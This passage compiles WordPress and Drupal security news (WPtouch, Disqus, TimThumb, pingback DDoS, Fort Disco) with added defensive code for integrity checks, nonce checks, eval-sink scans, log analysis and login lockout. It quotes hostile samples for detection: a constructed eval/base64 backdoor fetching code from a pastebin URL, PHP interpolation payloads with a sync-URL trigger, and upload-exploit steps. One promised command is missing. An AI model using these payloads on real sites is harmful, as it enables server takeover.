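    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """{relative path: sha256} for every PHP/JS file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(CHECKED_EXT):
                p = os.path.join(dirpath, fn)
                out[os.path.relpath(p, root).replace(os.sep, "/")] = sha256_file(p)
    return out


def compare(baseline, current):
    """Files whose hash changed, files absent from the baseline, files that vanished."""
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    return modified, added, missing


def grep_iocs(root, paths):
    """Run the IOC patterns over the given files; returns [(path, label)]."""
    hits = []
    for rel in paths:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        hits.extend((rel, label) for label, rx in IOC_PATTERNS.items() if rx.search(text))
    return hits


def write(root, rel, text):
    p = os.path.join(root, rel)
    os.makedirs(os.path.dirname(p), exist_ok=True)
    with open(p, "w") as fh:
        fh.write(text)


def demo():
    """Constructed miniature of a WordPress tree: take a baseline, then simulate both
    infections and return what the comparison plus IOC grep surfaces."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "wp-includes/template-loader.php", "<?php\n// clean loader (constructed)\n")
        write(root, "wp-links-opml.php", "<?php\n// clean OPML export (constructed)\n")
        baseline = snapshot(root)

        # SoakSoak-style: the core loader is changed to pull a dropped script into every page view.
        write(root, "wp-includes/template-loader.php",
              "<?php\n// clean loader (constructed)\n"
              "wp_enqueue_script('swobject', '/wp-includes/js/swobject.js');\n")
        write(root, "wp-includes/js/swobject.js", "eval(String.fromCharCode(/* constructed */));\n")
        # Pastebin-style: a decoded payload is injected into wp-links-opml.php, keyed on wp_nonce_once.
        write(root, "wp-links-opml.php",
              "<?php\nif (isset($_GET['wp_nonce_once'])) { eval(base64_decode("
              "file_get_contents('https://pastebin.com/raw/constructed'))); }\n")

        modified, added, missing = compare(baseline, snapshot(root))
        hits = grep_iocs(root, modified + added)
        return modified, added, missing, hits


if __name__ == "__main__":
    modified, added, missing, hits = demo()
    print("modified:", modified, "added:", added, "missing:", missing)
    for rel, label in hits:
        print(f"  {rel}: {label}")
```

In practice the baseline should come from a pristine copy of the same WordPress release rather than from the possibly-already-infected host, and the snapshot should be stored off the web server, since a backdoor that can rewrite wp-links-opml.php can rewrite a hash file sitting next to it just as easily.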

If you are behind Sucuri's Website Firewall (CloudProxy), you are protected from the SoakSoak malware campaign.

If you serve a mobile version of your WordPress website using the popular WPtouch plugin, you may be exposed to a critical vulnerability that could allow any logged-in, non-administrative user to upload malicious PHP files or backdoors to the server without admin privileges.

WordPress is a free and an open source blogging tool as well as a content management system (CMS) with 30,000 plugins, each of which offers custom functions and features enabling users to tailor their sites to their specific needs.

That is why it is easy to set up and is used by more than 73 million websites across the world, about 5.7 million of which use the WPtouch plugin, making it one of the most popular plugins in the WordPress plugin directory.

WPtouch is a mobile plugin that automatically enables a user-friendly and elegant mobile theme for rendering your WordPress content on mobile devices. Users can easily customize many aspects of its appearance from the administration panel and deliver a fast, stylish version of their site to mobile visitors without modifying or affecting the desktop theme.

PHP SHELL UPLOAD VULNERABILITY

Security researchers at Sucuri have warned WordPress users to update the popular WPtouch plugin after uncovering a vulnerability that could allow any logged-in user, without administrative privileges, to take over a site by uploading a backdoor into its directories.

The vulnerability was discovered during a routine audit for the company's web application firewall (WAF). Researchers said only websites that allow visitors to register accounts (the "Anyone can register" option, which many sites enable for commenting) are at risk.

The vulnerable version of the plugin uses WordPress's "admin_init" hook as an authentication mechanism, which lets a low-privileged user gain unrestricted access to the website by uploading malicious PHP files to the server.

Compromising a site is quite simple. The "admin_initialize()" method is called by the "admin_init" hook in the file "core/classwptouchpro.php." The admin nonce (number used once) is then generated and included in the WordPress script queue.

“This nonce was also used to verify whether or not a user could upload files to the server. As the script didn’t use any other form of identification to check or authenticate the user’s privilege to upload files, it was possible for any user to complete the upload in there,” says the blog post.

STEPS TO HACK A WORDPRESS WEBSITE

All an attacker had to do in order to compromise a vulnerable website was to:

Log in and obtain their nonce via wp-admin

Send an AJAX file upload request containing the leaked nonce and their backdoor

“So long story short – don’t only use nonces to protect sensitive methods, always add functions such as “current_user_can()” or the likes to confirm a user’s right to do something.”
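The point in the quote above, that a nonce is not an authorization check, as an added example (not WPtouch's code and not Sucuri's): a constructed stand-in for WordPress nonces, a small role-to-capability table, and the upload gate written both ways. A subscriber's perfectly valid nonce passes the nonce-only gate; the fixed gate also asks whether the user holds upload_files, as current_user_can() would.

```python
import hashlib
import hmac
import time

# Constructed stand-in for WordPress nonces: an HMAC over (tick, action, user id) truncated
# to 10 hex characters, accepted for the current and the previous 12-hour tick.
SITE_SECRET = b"constructed-site-secret"
NONCE_LIFE = 12 * 60 * 60

ROLE_CAPS = {  # subset of WordPress's default capability map
    "subscriber": {"read"},
    "author": {"read", "upload_files", "edit_posts"},
    "administrator": {"read", "upload_files", "edit_posts", "manage_options"},
}


def nonce_tick(now=None):
    return int((time.time() if now is None else now) // NONCE_LIFE)


def create_nonce(user_id, action, now=None):
    msg = f"{nonce_tick(now)}|{action}|{user_id}".encode()
    return hmac.new(SITE_SECRET, msg, hashlib.sha256).hexdigest()[:10]


def verify_nonce(nonce, user_id, action, now=None):
    """True if the nonce was minted for this user and action in this or the previous tick."""
    now = time.time() if now is None else now
    for back in (0, NONCE_LIFE):
        if hmac.compare_digest(create_nonce(user_id, action, now - back), nonce):
            return True
    return False


class User:
    def __init__(self, user_id, role):
        self.id, self.role = user_id, role

    def can(self, capability):  # stand-in for current_user_can()
        return capability in ROLE_CAPS[self.role]


def handle_upload_vulnerable(user, nonce, filename):
    """WPtouch-style gate: a valid nonce is treated as if it were authorization."""
    if not verify_nonce(nonce, user.id, "wptouch_admin"):
        return "rejected: bad nonce"
    return f"stored {filename}"


def handle_upload_fixed(user, nonce, filename):
    """The nonce proves the request came from a page rendered for this user (anti-CSRF);
    the capability check decides whether this user may upload at all."""
    if not verify_nonce(nonce, user.id, "wptouch_admin"):
        return "rejected: bad nonce"
    if not user.can("upload_files"):
        return "rejected: insufficient capability"
    return f"stored {filename}"


if __name__ == "__main__":
    subscriber = User(7, "subscriber")
    # The admin_init hook hands the subscriber a valid nonce simply for loading wp-admin.
    leaked = create_nonce(subscriber.id, "wptouch_admin")
    print("nonce-only gate:", handle_upload_vulnerable(subscriber, leaked, "backdoor.php"))
    print("fixed gate:     ", handle_upload_fixed(subscriber, leaked, "backdoor.php"))
```

The vulnerable handler is not wrong about the nonce: it is genuine, unexpired and bound to the right user. It is wrong about what the nonce means. Every privileged AJAX action needs both checks, in that order, and the capability should be the narrowest one the action requires rather than a blanket manage_options.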

The vulnerability only affects websites running the plugin's 3.x versions. Users and administrators still on earlier versions have nothing to worry about from this bug, but should update regardless.

The issue with WPTouch is not the only security vulnerability researchers at Sucuri have discovered. At the beginning of June, Sucuri found two serious vulnerabilities in the popular WordPress SEO plugin called “All in One SEO Pack”

The security team also discovered a critical remote code execution (RCE) flaw in the 'Disqus Comment System' plugin for WordPress a few weeks earlier.

A remote code execution (RCE) vulnerability has been discovered in the Disqus comment and discussion plugin for WordPress, the most popular blogging platform.

While there are more than 70 million websites on the Internet currently running WordPress, about 1.3 million of them use the ‘Disqus Comment System’ Plugin, making it one of the popular plugins of Wordpress for web comments and discussions.

The security team at Sucuri discovered the critical remote code execution (RCE) flaw while analyzing the plugin's custom JSON parser: its variable parsing function passes data to an insecurely used PHP eval() call, allowing anyone to execute commands on the server.

WHO ARE VULNERABLE

The remote code execution (RCE) vulnerability can be triggered by a remote attacker only if the server/website is running the following application versions:

PHP version 5.1.6 or earlier

WordPress 3.1.4 or earlier

Wordpress Plugin Disqus Comment System 2.75 or earlier

HOW TO EXPLOIT DISQUS

For successful exploitation, an attacker posts a custom payload, for example {${phpinfo()}}, as a comment on the targeted post or page, and then only needs to open the following 'Comment Synchronization' URL with the targeted post ID to take advantage of the vulnerability.

http://somesite.com/?cf_action=sync_comments&post_id=TARGET_POST_ID

“While the flaw itself is very dangerous” reads the blog post. “That's it, looks simple right? So if you are using an outdated version of WordPress/PHP, you need to update Disqus asap.”
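For the parser weakness and the payload shown above, an added audit example (not Disqus's code and not Sucuri's): a regex pass that flags every eval() call whose argument is anything other than a bare string literal, and a scan of stored comment bodies for PHP interpolation payloads of the {${...}} form, which is what to run over a comments export when triaging a site that ran the affected versions. The sample parser function, its names and the comment rows are constructed.

```python
import re

# A PHP eval() call and its argument text, up to the first ');' on the line.
EVAL_CALL = re.compile(r"\beval\s*\((?P<arg>.*?)\)\s*;")
# A single string literal. Single-quoted PHP strings never interpolate, so '$x' is safe there;
# double-quoted ones interpolate, so any '$' inside them is treated as not-a-literal.
LITERAL_ONLY = re.compile(r"""^\s*(?:'[^']*'|"[^"$]*")\s*$""")
# Double-quoted interpolation forms that execute code when the string is eval'd:
# "{${expr}}" (the exact shape of the payload above) and "${expr(...)}".
INTERPOLATION_PAYLOAD = re.compile(r"\{\$\{.*?\}\}|\$\{\s*[^}]*\(")


def find_eval_sinks(php_source):
    """[(line number, argument text)] for eval() calls fed by variables, concatenation
    or interpolated strings, i.e. anything an attacker-controlled value could reach."""
    sinks = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in EVAL_CALL.finditer(line):
            arg = m.group("arg")
            if not LITERAL_ONLY.match(arg):
                sinks.append((lineno, arg.strip()))
    return sinks


def suspicious_comments(comments):
    """Comment rows whose body carries a PHP interpolation payload."""
    return [(cid, body) for cid, body in comments if INTERPOLATION_PAYLOAD.search(body)]


# Constructed PHP modelled on the description above: a hand-written JSON parser that
# rebuilds values with eval() on a double-quoted string. Not the plugin's actual code.
PARSER_SAMPLE = r'''<?php
function dsq_json_value($raw) {
    eval('$value = "' . $raw . '";');   // interpolation + eval: "{${phpinfo()}}" runs phpinfo()
    return $value;
}
function dsq_version() { eval('$v = "2.75";'); return $v; }   // literal only, no external input
'''

# Constructed comment rows (id, body), as exported from wp_comments.
COMMENTS_SAMPLE = [
    (101, "Great write-up, thanks!"),
    (102, "{${phpinfo()}}"),
    (103, 'test ${@eval($_GET["c"])}'),
]


if __name__ == "__main__":
    for lineno, arg in find_eval_sinks(PARSER_SAMPLE):
        print(f"eval sink at line {lineno}: {arg}")
    for cid, body in suspicious_comments(COMMENTS_SAMPLE):
        print(f"comment {cid} carries an interpolation payload: {body}")
```

A flagged sink is a finding to read, not proof of a bug; the question for each one is whether the argument can ever contain text a remote party wrote. A flagged comment on a site that ran the affected plugin and PHP versions is the other half: it means someone already tried the route described above, and the sync request that follows should be looked for in the access logs.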

At the beginning of the month, the same Sucuri team discovered a critical vulnerability in All in One SEO Pack, a plugin that optimizes WordPress sites for search engines, potentially leaving millions of websites vulnerable to attackers.

HOW TO PATCH VULNERABILITY

If left unpatched, the flaw could allow an attacker to do anything they want with a vulnerable website. So it is highly recommended that anyone running outdated versions of WordPress, the Disqus Comment System plugin (fixed in 2.76) and PHP upgrade to the latest versions as soon as possible.

WordPress users should be able to update the Disqus plugin by signing into their WordPress administrative panel > Disqus Comment System plugin > drop-down at the top or bottom of the page > click "Update." Users can also update the plugin manually by overwriting the plugin files directly in the WordPress plugin directory.

Yesterday we learned of a critical zero-day vulnerability in a popular image resizing library called TimThumb, which is used in thousands of WordPress themes and plugins.

WordPress is a free and open source blogging tool and content management system (CMS) with more than 30,000 plugins, each offering custom functions and features that let users tailor their sites to their specific needs. It is easy to set up and use, which is why tens of millions of websites across the world opt for it.

But if you or your company use the popular image resizing library “TimThumb” to resize large images into usable thumbnails for display on your site, then make sure to update the file as soon as the patched version is released, and check the TimThumb site regularly for it.

0-Day REMOTE CODE EXECUTION & NO PATCH

The critical vulnerability, discovered by Pichaya Morimoto in the TimThumb WordPress plugin version 2.8.13, resides in its “Webshot” feature, which, when enabled, allows attackers to execute commands on the remote website.

The vulnerability allows an attacker to remotely execute arbitrary PHP code on the affected website. Once the PHP code has been executed, the website can easily be compromised in whatever way the attacker wants. At the time of writing there is no patch available for the flaw.

“With a simple command, an attacker can create, remove and modify any files on your server,” say security experts at Sucuri in a blog post.

Using the following command, a hacker can create, delete and modify any files on your server:

Multiple serious vulnerabilities have been discovered in the hugely popular ‘All In One SEO Pack’ plugin for WordPress, putting millions of WordPress websites at risk.

WordPress is easy to set up and use, which is why a large number of people like it. But if you or your company use the ‘All in One SEO Pack’ WordPress plugin to optimize your website's ranking in search engines, then you should update the plugin immediately to the latest version, All in One SEO Pack 2.1.6.

Today, the All in One SEO Pack plugin team released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross-site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean-up service.

More than 73 million websites on the Internet run on the WordPress publishing platform, and more than 15 million websites currently use the All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website’s meta information, which could harm its search engine ranking.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author or subscriber), could add or modify certain parameters used by the plugin. It includes the post’s SEO title, description and keyword meta tags," Sucuri said.

The reported cross-site scripting vulnerability can also be exploited by malicious hackers to execute malicious JavaScript code in an administrator’s control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin’s account password to leaving some backdoor in your website’s files in order to conduct even more “evil” activities later," the Sucuri blog post said.

Vulnerabilities in WordPress plugins are the root cause of the majority of WordPress compromises and are one of the main tools in web attackers' arsenal. Plugin vulnerabilities can be exploited to access sensitive information, deface websites, redirect visitors to malicious sites, or perform DDoS attacks.

So far we haven't seen any attacks exploiting these vulnerabilities in the wild, but WordPress website owners are advised to update their All in One SEO Pack WordPress plugin to the latest version immediately.

DDoS attacks are a growing issue faced by governments and businesses. In a recent attack, thousands of legitimate WordPress websites were hijacked by attackers without the need for them to be compromised. Instead, the attackers took advantage of an existing WordPress vulnerability (CVE-2013-0235), “Pingback Denial of Service possibility”.

The attack exploited an issue in WordPress's XML-RPC (XML remote procedure call) interface, which is used to provide services such as pingbacks and trackbacks and allows anyone to make a WordPress site issue a request to an arbitrary site.

The functionality is meant to generate cross-references between blogs, but it can easily be used by a single machine to originate millions of requests from multiple locations.

"Any WordPress site with XML-RPC enabled (which is on by default) can be used in DDoS attacks against other sites,” a Sucuri researcher said in the blog post.

The pingback mechanism has been known to be a security risk for some time. XML-RPC is enabled by default on WordPress, and websites with no protection mechanism are vulnerable to this attack.

To stop your WordPress website from being misused, you need to disable the XML-RPC pingback functionality on your site, but completely disabling XML-RPC itself is usually not an option because it is needed for important features. WordPress administrators can use the online WordPress DDoS Scanner tool to find out whether their blog is vulnerable, and if it is, a better way to block the abuse is to add the following code to your theme:
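The snippet the paragraph refers to does not appear in this copy of the article. What follows is an added example, not the article's own code, of how a site owner can switch off pingbacks while leaving the rest of XML-RPC intact, using three public WordPress filter hooks (xmlrpc_methods, wp_headers and pings_open). Save it as a file in wp-content/mu-plugins/ or paste it into the active theme's functions.php:

```php
<?php
/**
 * Plugin Name: Disable pingbacks (added example, not from the article)
 *
 * Removes the pingback.ping XML-RPC method so this site can no longer be made
 * to send requests to arbitrary targets, while the remaining XML-RPC methods
 * stay available for mobile apps and remote publishing.
 */

// Drop the pingback.ping method from the XML-RPC method table, so the server
// answers such calls with "method not found" instead of fetching a URL.
add_filter('xmlrpc_methods', function (array $methods): array {
    unset($methods['pingback.ping']);
    return $methods;
});

// Stop advertising the endpoint: WordPress adds an X-Pingback response header
// whenever pings are open, which is how the endpoint is discovered.
add_filter('wp_headers', function (array $headers): array {
    unset($headers['X-Pingback']);
    return $headers;
});

// Report pings as closed on every post, so no pingback <link> tag is emitted
// either. __return_false is a WordPress helper that simply returns false.
add_filter('pings_open', '__return_false', 10, 2);
```

After activating it, a request for `xmlrpc.php` still succeeds (other clients keep working) but a `pingback.ping` call is rejected, and the site no longer appears in lists such as the ones published for the attacks described above.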

In a recent cyber attack on a forum site, thousands of outdated but legitimate WordPress blogs were abused to perform DDoS attacks using previously known vulnerabilities.

After analyzing the log file from the victim's server, we noticed many WordPress-based educational (.EDU) and government (.GOV) websites from which the attack originated.

In the past we have reported on many such cyber attacks, where attackers broke into WordPress blogs using password brute-force attacks, or used the pingback vulnerability in older versions of WordPress without compromising the server at all.

WordPress has a built-in feature called Pingback, which allows anyone to make a WordPress site send a request to an arbitrary site, and it can be used by a single machine to originate millions of requests from multiple locations.

We have seen more than 100,000 IP addresses involved in the recent DDoS attack, and the victim's forum website received more than 40,000 requests in 7 minutes from different WordPress blogs and IP addresses.

In this recent attack, we noticed more than 4000 .EDU and .GOV sites along with thousands of other abused sites, including the following:

open.nasa.gov

oversight.house.gov

digitalbusiness.gov.au

pilr.blogs.law.pace.edu

itp.nyu.edu/~mlt324/MattTsBlog

cctevents.creighton.edu

tech.journalism.cuny.edu

languagelog.ldc.upenn.edu/nll

researchcenter.journalism.cuny.edu

testkitchen.colorado.edu

smartpyme.blogs.uoc.edu

journalism.cuny.edu

blogs.ei.columbia.edu

admissions.vanderbilt.edu/vandybloggers

erb.umich.edu

metalab.harvard.edu

greenlaw.blogs.law.pace.edu

and thousands more.

These large servers can cause much more damage in DDoS attacks because they have large network bandwidth and are capable of generating significant amounts of traffic.

At this time it is not clear whether these WordPress blogs were compromised or whether the pingback vulnerability was used to perform the attack.

But it is always wise to learn from others' mistakes. If you still use 'admin' or another common name as the username on your blog, change it and use a strong password. Security plugins and two-factor authentication options are also available for WordPress, and of course make sure you are running the latest version of WordPress.

A large-scale cyber attack campaign is currently under way against a large number of WordPress websites across the Internet.

In April 2012 we reported on a large distributed brute-force attack against millions of WordPress sites, in which attackers succeeded in compromising 90,000 servers to create a large botnet of WordPress hosts.

According to a DDoS attack log report received from 'The Hacker News' reader 'Steven Veldkamp', the victim's website was recently under heavy DDoS attack coming from various compromised WordPress-based websites.

Possibly by brute-forcing WordPress administrative portals with a word list of the most commonly used username and password combinations, attackers are taking control of many poorly secured WordPress hosts.

After analyzing a piece of the DDoS attack log file covering 23/Sep/2013:13:03:13 +0200 to 23/Sep/2013:13:02:47 +0200, we found that within 26 seconds the attacker was able to perform the DDoS attack from 569 unique compromised WordPress blogs. Hacked websites include blogs of Mercury Science and Policy at MIT, the National Endowment for the Arts (arts.gov), The Pennsylvania State University and Stevens Institute of Technology.

So the attacker is using a large number of high-performance hosts to build a much larger botnet for DDoS attacks. The attack is happening at a global level, and WordPress instances across hosting providers are being targeted. Since the attack is highly distributed in nature (most of the IPs used are spoofed), it is very difficult to block all malicious traffic.
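For readers who want to run the same analysis on their own logs, the following is an added example (not the tool behind the figures above; the log lines are constructed, not taken from the victim's server) of extracting the abused WordPress blogs and the request rate from an Apache combined-format access log. It relies on the fact that WordPress identifies itself in the User-Agent header as "WordPress/<version>; <blog URL>" (with "; verifying pingback from <ip>" appended on verification requests), which is how the originating blogs, rather than just IP addresses, are recovered:

```php
<?php
// Added example, not The Hacker News' or any vendor's code: summarise a
// WordPress-originated request flood from the victim side of an Apache
// combined-format access log. The sample lines below are constructed.

$sample_log = <<<'LOG'
198.51.100.10 - - [23/Sep/2013:13:02:47 +0200] "GET /forum/?123 HTTP/1.0" 200 5120 "-" "WordPress/3.6; http://blog.example.edu"
198.51.100.11 - - [23/Sep/2013:13:02:48 +0200] "GET /forum/?124 HTTP/1.0" 200 5120 "-" "WordPress/3.5.1; http://arts.example.gov; verifying pingback from 203.0.113.7"
198.51.100.10 - - [23/Sep/2013:13:02:49 +0200] "GET /forum/?125 HTTP/1.0" 200 5120 "-" "WordPress/3.6; http://blog.example.edu"
192.0.2.44 - - [23/Sep/2013:13:02:50 +0200] "GET /forum/ HTTP/1.1" 200 9800 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/24.0"
198.51.100.12 - - [23/Sep/2013:13:03:13 +0200] "GET /forum/?126 HTTP/1.0" 200 5120 "-" "WordPress/3.6; http://news.example.edu"
LOG;

// Parse one combined-format line into its fields, or return null if it does not match.
function parse_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    return [
        'ip'     => $m[1],
        'time'   => $ts ? $ts->getTimestamp() : null,
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
        'ua'     => $m[6],
    ];
}

// Return the blog URL when the request was sent by a WordPress instance, else null.
function wordpress_origin(string $ua): ?string
{
    return preg_match('#^WordPress/[\d.]+; (https?://[^;\s]+)#', $ua, $m) ? $m[1] : null;
}

// Summarise a log excerpt: how many requests came from WordPress blogs, how many
// distinct blogs and source IPs were involved, over how many seconds, and the
// per-blog hit counts to pass on to the blog owners.
function summarize_pingback_flood(string $log): array
{
    $blogs = [];
    $ips   = [];
    $times = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $rec = parse_log_line($line);
        if ($rec === null || ($blog = wordpress_origin($rec['ua'])) === null) {
            continue;   // unparsable, or an ordinary browser request
        }
        $blogs[$blog]     = ($blogs[$blog] ?? 0) + 1;
        $ips[$rec['ip']]  = ($ips[$rec['ip']] ?? 0) + 1;
        if ($rec['time'] !== null) {
            $times[] = $rec['time'];
        }
    }
    $span = $times ? max($times) - min($times) : 0;
    arsort($blogs);   // noisiest blogs first
    return [
        'wordpress_requests' => array_sum($blogs),
        'unique_blogs'       => count($blogs),
        'unique_ips'         => count($ips),
        'window_seconds'     => $span,
        'blogs'              => $blogs,
    ];
}

$summary = summarize_pingback_flood($sample_log);
// For the constructed excerpt: 4 WordPress-originated requests from 3 blogs (3 IPs) in 26 s.
printf("%d WordPress-originated requests from %d blogs (%d IPs) in %d s\n",
    $summary['wordpress_requests'], $summary['unique_blogs'],
    $summary['unique_ips'], $summary['window_seconds']);
foreach ($summary['blogs'] as $blog => $hits) {
    printf("  %-30s %d\n", $blog, $hits);
}
```

On a real log the per-blog list is the useful output: each entry is a site whose owner can be told to disable pingbacks, which is how the lists published in these reports were assembled.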

According to statistics recently published by WP WhiteSecurity, more than 70% of the WordPress installations found among the world's top 1 million websites are vulnerable to attack.

From the table above you can see that at least 30,823 of 42,106 WordPress websites have exploitable vulnerabilities, which can be detected using free automated vulnerability assessment tools.

Also, in August 2012 researchers at Arbor Networks uncovered a botnet called Fort Disco that was used to compromise more than 6000 websites based on popular CMSs such as WordPress, Joomla and DataLife Engine.

If you are running WordPress sites, now would be a good time to ensure that strong passwords are always used and that your username is changed from “admin”.

Password theft has been a growing problem within the security community. Researchers at Arbor Networks have uncovered a botnet called Fort Disco that was used to compromise more than 6000 websites based on popular CMSs such as WordPress, Joomla and DataLife Engine.

The Fort Disco botnet is currently made up of nearly 25,000 Windows machines and receives a list of sites to attack from a central command and control server. The bots also receive a list of common username-password combinations, typically default combinations with passwords such as admin or 123456.

Arbor Networks security researcher Matthew Bing said the attack has several advanced features that make it next to impossible to track fully; the researchers obtained valuable information on the botnet by taking advantage of a misconfiguration on the attackers’ side that allowed them to analyze logs on several of the six command and control servers discovered.

“We stumbled upon these detailed logs the attacker left open on some of the command and control servers,” Bing said. “We were able to piece together enough of the picture.”

The Fort Disco botnet was responsible for a series of brute-force attacks against thousands of websites; on compromised websites, security experts found a variant of the FilesMan PHP backdoor used by the botmaster to remotely control the victims' PCs.

The backdoor allows file management on the victims as well as the download and execution of malicious payloads, and of course it is used to send commands to bots. A PHP shell uploaded to the compromised sites in fact lets the botmaster issue commands to tens of thousands of bots quickly.

Fort Disco is similar to the Brobot attacks being used in the ongoing attacks against financial services firms. Arbor does not have evidence that the Fort Disco attacks are related to the QCF/Brobot incidents or the phishing campaigns that have been used against the banks.

"Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems," Bing states. "This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms."

Another detail that emerged from the investigation is that a small number of websites also carried a PHP-based redirector used to send visitors to websites hosting the Styx exploit kit.

The top three countries in terms of infections are the Philippines, Peru, and Mexico. Bing added that the authors are likely Russian, given that the C&Cs were found on Russian and Ukrainian IP addresses, the default characters are in Cyrillic, and some error strings within the malware were written in Russian.
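Arbor's description of Fort Disco (a target list plus a default-credentials list handed to bots) points to two controls at the login form, which is also where the "change 'admin' and use a strong password" advice in the earlier reports lands. The following is an added example, not Arbor Networks' or WordPress's code, of both: a per-source, per-username failed-login lockout and a reject list for the default credentials the bots try first. It runs stand-alone on an in-memory store; in WordPress the same logic would be attached to the wp_login_failed action (record a failure) and the authenticate filter (refuse while locked out), with the store kept in transients, which the comments describe but do not wire up. Thresholds and word lists are constructed:

```php
<?php
// Added example, not Arbor Networks' or WordPress's code: a sliding-window
// failed-login lockout plus a default-credential reject list. In-memory store so
// it runs stand-alone; on WordPress, call recordFailure() from the
// 'wp_login_failed' action and isLockedOut() from the 'authenticate' filter,
// and back $failures with set_transient()/get_transient() (not wired up here).

final class LoginGuard
{
    /** @var array<string, int[]> failure timestamps keyed by source|username */
    private array $failures = [];

    public function __construct(
        private int $maxFailures = 5,      // constructed threshold
        private int $windowSeconds = 900,  // constructed sliding window (15 min)
    ) {}

    // Key on source address and username together: a bot cycling a password
    // list against "admin" is locked out without penalising a whole NAT.
    private function key(string $ip, string $username): string
    {
        return $ip . '|' . strtolower($username);
    }

    public function recordFailure(string $ip, string $username, int $now): void
    {
        $this->failures[$this->key($ip, $username)][] = $now;
    }

    public function isLockedOut(string $ip, string $username, int $now): bool
    {
        $k = $this->key($ip, $username);
        $recent = array_values(array_filter(
            $this->failures[$k] ?? [],
            fn(int $t) => $now - $t < $this->windowSeconds
        ));
        $this->failures[$k] = $recent;   // drop entries that fell out of the window
        return count($recent) >= $this->maxFailures;
    }
}

// Credentials a botnet's default list tries first; reject them at account
// creation and password change. Constructed lists; extend from your own policy.
const WEAK_USERNAMES = ['admin', 'administrator', 'root', 'test', 'user'];
const WEAK_PASSWORDS = ['admin', '123456', 'password', 'qwerty', '12345678', 'letmein'];

function credential_problems(string $username, string $password): array
{
    $problems = [];
    if (in_array(strtolower($username), WEAK_USERNAMES, true)) {
        $problems[] = 'username is on the default list';
    }
    if (in_array(strtolower($password), WEAK_PASSWORDS, true)) {
        $problems[] = 'password is on the default list';
    }
    if (strlen($password) < 12) {
        $problems[] = 'password shorter than 12 characters';
    }
    if (strcasecmp($username, $password) === 0) {
        $problems[] = 'password equals username';
    }
    return $problems;
}

// Walk-through with constructed input: one bot firing the default list at "admin".
$guard = new LoginGuard();
$t = 1_380_000_000;
foreach (['admin', '123456', 'password', 'qwerty', '12345678'] as $i => $guess) {
    $guard->recordFailure('198.51.100.20', 'admin', $t + $i);   // five failures in 5 s
}
assert($guard->isLockedOut('198.51.100.20', 'admin', $t + 5) === true);
assert($guard->isLockedOut('198.51.100.20', 'admin', $t + 1000) === false); // window expired
assert($guard->isLockedOut('198.51.100.21', 'admin', $t + 5) === false);    // other source

assert(credential_problems('admin', 'admin') === [
    'username is on the default list',
    'password is on the default list',
    'password shorter than 12 characters',
    'password equals username',
]);
assert(credential_problems('j.doe', 'correct-horse-battery') === []);
```

The lockout alone does not stop a 25,000-host botnet, since each host gets its own budget of attempts; it is the reject list and a non-default username that make the bots' credential file useless against the site.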

The Drupal Association has announced a Drupal data breach: passwords for almost one million accounts on the Drupal.org website are being reset after attackers gained unauthorized access to sensitive user data.

The security of the open source content management system's site was compromised via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. As a countermeasure, the association is resetting the passwords for nearly one million accounts in the wake of the data breach.

Information exposed includes usernames, email addresses and country information, as well as hashed passwords. Drupal.org hasn't revealed the name of the third-party application exploited in the attack.

Evidence of the Drupal data breach was found during a routine security audit:

“Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files,” the announcement reads. “The Drupal security team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability.”

“The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org.

This access was accomplished via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.”

The Drupal data breach is a serious matter for user security, since an impressive number of websites is based on the popular content management system. However, the thousands of websites that run Drupal software, estimated at 2 percent of all sites, should not be affected by the data breach.

The Drupal.org Security Team confirmed the “unauthorized access” to its systems, highlighting that there is no evidence that any information was actually stolen. As a precautionary measure, all users were asked to reset their passwords at their next login attempt.

Holly Ross, Executive Director of the Drupal Association, confirmed that they are investigating the incident, which could also have exposed other information: “We are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly.”

Attacks on open source CMS solutions are not isolated cases, given how widely these platforms are deployed: in the past the Joomla and WordPress platforms were hit and used to spread malicious code, and WordPress was recently hit by a massive “brute-force” attack by a botnet of almost 100,000 bots.

It is easy to predict that this kind of attack will increase, since the wide deployment of these platforms makes them privileged targets.

Drupal.org account holders will be required to change their password by entering their username or e-mail address and following the link included in the e-mail message that follows.

Distributed Denial of Service attacks have increased in scale, intensity and frequency. The wide range of motives for these attacks (political, criminal or social) makes every merchant or organization with an online presence a potential target.

Over the weekend Incapsula mitigated a unique DDoS attack against a large gaming website, in which it discovered a DDoS attack using thousands of legitimate WordPress blogs without the need for them to be compromised.

Incapsula released a list of approximately 2,500 WordPress sites from which the attack originated, including some very large sites such as Trendmicro.com, Gizmodo.it and Zendesk.com.

